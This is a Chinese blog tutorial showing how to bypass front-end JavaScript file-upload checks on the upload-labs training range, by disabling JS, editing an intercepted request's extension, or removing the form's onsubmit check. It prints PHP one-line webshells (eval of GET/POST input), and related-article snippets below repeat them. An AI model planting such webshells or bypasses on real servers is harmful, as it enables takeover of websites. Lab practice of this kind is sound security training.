文件上传验证绕过——客户端JS绕过

最新推荐文章于 2025-05-02 15:21:10 发布
最新推荐文章于 2025-05-02 15:21:10 发布
阅读量597 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: web安全 网络安全 安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Williamanddog/article/details/128776163
版权

文件上传是Web网页中常见的功能之一,通常情况下恶意的文件上传,会形成漏洞。 大致逻辑是:用户通过上传点上传了恶意文件,通过服务器的校验后保存到指定的位置。当用户访问已 经上传成功的文件时,上传的Web脚本会被Web容器进行解析,从而对网站造成危害。

我们利用upload-labs来进行演示:

Upload-labs(Pass-01)源码分析,通过验证发现是前端JS验证。而前端验证,几乎没有什么防护作用

(1)禁用JS

浏览器直接禁用JS,先按F12,然后按F1,找到禁用JS

phpinfo

<?php phpinfo();?>

PHP一句话木马

<?php eval(@$_GET['a']);

直接上传php木马,上传成功

然后我们访问该图片,并用hackbar访问phpinfo()

(2)后缀名绕过

先把一句话木马改为 .jpg|.png 其中一个后缀,上传,抓包

将jpg改成php,上传成功

(3)修改前端代码

直接修改前端代码,上传,删除 form 标签的 onsubmit 事件即可成功上传

将return checkFile()删除,再上传一句话木马

上传成功

漏洞复现篇——文件上传js绕过
爱国小白帽
02-13 1951
漏洞说明: Web应用系统虽然对用户上传文件进行了校验,但是校验是通过前端javascript代码完成的。由于恶意用户可以对前端javascript进行修改或者是通过抓包软件篡改上传文件,就会导致基于js的校验很容易被绕过。 实验环境: 火狐浏览器 PHPstudy Burp Suite抓包软件 upload-labs-master上传漏洞靶场 首先判断是否存在前端js绕过漏洞 按F1...
文件上传小结——文件上传漏洞、文件上传校验姿势、文件上传绕过文件包含漏洞、服务器解析漏洞……
7Riven's blog
12-02 751
文件上传文件上传可以与文件包含相结合 1.文件上传漏洞: 文件上传漏洞需要的前提条件: 能上传木马 上传的木马能执行 还要清楚上传后的路径 一句话木马:<?php @eval($_POST[cmd]);?> eval 执行命令函数 思路: 编写一个一句话木马<?php?> 上传一句话木马 上菜刀 图片马制作: 找个图片,用记事本打开,添加一句话 ...
文件上传JS 绕过
WO96354205的博客
04-17 2823
首先上传一个php文件,发现禁止上传。 这里我们需要嘴一个判断,判断是前端还是服务端禁止了。那么如何判断是前端做了检测? ps技巧:通过抓包,如果没有数据则可以判断是前端,否则是后端 源代码如下: 可以看到在代码只允许上传文件类型. 我们上传一个php文件,发现是没有看到数据的,这里可以判断是js拦截 那么如何绕过 方法1: 我们右键检查元素,删除检测文件类型的代码 οnsubmit="return checkFile() 然后上传s.jpg,使用burpsuit抓包,将s.jpg 改成s.ph
文件上传漏洞学习记录——js绕过方法
最新发布
2502_91116367的博客
05-02 713
js绕过方法
34、文件上传 -- 绕过JS验证
Web安全工具库
01-10 363
一、上传一个1.jpg和1.php文件 可以上传jpg文件 不可以上传php文件 二、利用burpsuite绕过 1、重新上传1.php 2、forward 三、利用火狐插件绕过 1、安装Disable JavaScript插件,关闭 2、重新上传 禁止非法,后果自负 欢迎关注公众号:web安全工具库 ...
文件上传绕过前端 js 检测上传
2301_79299101的博客
11-08 364
1,在文件上传时,用户选择文件时,或者提交时,有些网站会对前端文件名进行验证,一般检测后缀名,是否为上传的格式。此时数据包并没有提交到服务器,只是在客户端通过js 文件进行校验,验证不通过则不会提交到服务器进行处理。3,把恶意文件改成 js 允许上传文件后缀,如 jpg、gif、png 等,再通过抓包工具抓取 post 的数据包,把后缀名改成可执行的脚本后缀如php 、asp、jsp、net 等。2,按 F12 使用网页审计元素,把校验的上传文件后缀名文件删除,即可上传
文件上传之路之二:绕过前端JS检测上传
weixin_62715196的博客
08-14 333
绕过前端js检测文件上传,用手工注入或者使用工具注入,来实现文件上传,通过实操进一步去了解文件上传漏洞
文件上传漏洞——JS绕过
qq_42777804的博客
08-03 5643
预备知识 【BurpSuite】的基本使用 客户端javascript检测的原理 【中国菜刀】的基本使用 实验目的 绕过JavaScript验证检测,上传一句话木马。-- 实验工具 BurpSuite、中国菜刀、一句话木马 实验环境 服务器一台(Windows Server 2003)客户机一台(windows Server 2003) 实验步骤 第一步:打开下方网页,上传事...
渗透测试:文件上传验证绕过策略分析
0x01章节探讨了客户端验证绕过,特别是JavaScript扩展名检测。通常,网站会使用JavaScript检查上传文件的扩展名,防止非法文件类型。但通过工具如Burp Suite,可以捕获并修改网络请求,绕过这种客户端验证。 0x02...
网络安全文件上传黑白名单及数组绕过技巧
goldfish8848的博客
07-28 2270
客户端数据以文件形式封装,通过网络协议发送到服务器端,在服务器解析数据,最终在服务端硬盘上作为真实的文件保存。
文件上传漏洞-02】前端限制与绕过靶场实战
cc
02-14 5540
由于JS限制,它的运行环境是我们本地浏览器,只要能看得懂JS代码,就可以进行修改JS代码甚至是删除表单事件来做绕过。由于JS限制,它的运行环境是我们本地浏览器,只要能看得懂JS代码,就可以进行修改JS代码甚至是删除表单事件来做绕过
iwebsec文件上传漏洞-前端JS过滤绕过
qq_56041380的博客
03-27 1058
前端JS过滤绕过的原理是:应用程序是在前端通过JS代码进行验证,而不是在程序后端进行验证,这样攻击者就可以通过修改前端JS代码绕过上传过滤,上传木马。
绕过前台脚本检测扩展名上传一句话木马
AmyBaby00的博客
09-09 1427
绕过前台脚本检测扩展名上传WebShell 1、新建txt文件,写入一句话木马。 将txt文件后缀更改为.php 格式 把一句话木马格式改成JPG,再次尝试上传 格式正确,上传成功。 2、开启代理,打开BP 尝试抓包,改包,上传一句话木马 BP抓包到上传文件名称及内容 改包,放包 3、打开菜刀,尝试连接 双击刚才的url,进入页面 连接成功 利用菜刀即可控制本机… 任意增删改等等… ...
文件上传-绕过JS前端验证
你们de4月天的博客
09-18 2577
文件上传漏洞染过JS前端验证
文件上传之前端JS绕过
注定风是不羁旅人
11-21 2136
记录一下在靶场练习中的绕过姿势 1.首先如何知道目标是使用前端JS验证文件类型呢? 使用工具burp suite进行抓包,点击上传按钮之后,工具内没有显示抓包信息,反而网页弹出提示框,提示上传文件类型不符合,则证明是使用的前端JS验证 2.绕过方法一,使用工具burpsuite抓包改包绕过 首先把写好的一句话木马修改后缀格式为jpg, 然后上传这个文件,进行抓包 在红色框的位置,修改之前是yi...
文件上传 禁用js
weixin_45774059的博客
06-10 321
引用js文件,导致我们无法根据提示进行搜索 安装插件https://addons.mozilla.org/zh-CN/firefox/addon/disable-javascript/?src=search打开插件并禁用js
多种文件上传绕过手法
aurora__的博客
05-08 1190
转载自安全脉搏95zz 相信大家都或多或少遇到过上传的问题,本文讲些小技巧,原理用文字叙述实在麻烦 目录:JS验证实例 /大小写/双重后缀名/过滤绕过/特殊后缀名/文件流类型/文件重写 1.javascript验证突破 查看源代码 在IE中禁用掉即可(火狐的noscript插件也行) 2.大小写突破 他只是把php做了限制,改成Php就可以了 3.双重后缀名突破 在...
文件上传绕过方法总结(入门必看)
qq_65165505的博客
05-13 6138
常见文件上传绕过方法的总结
文件上传漏洞和绕过方式详细介绍
weixin_52206305的博客
04-18 1109
通常一个文件以HTTP协议进行上传时,将以POST请求发送WEB服务器,WEB服务器接收到请求并同意后,用户与WEB服务器将建立连接,并传输data。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值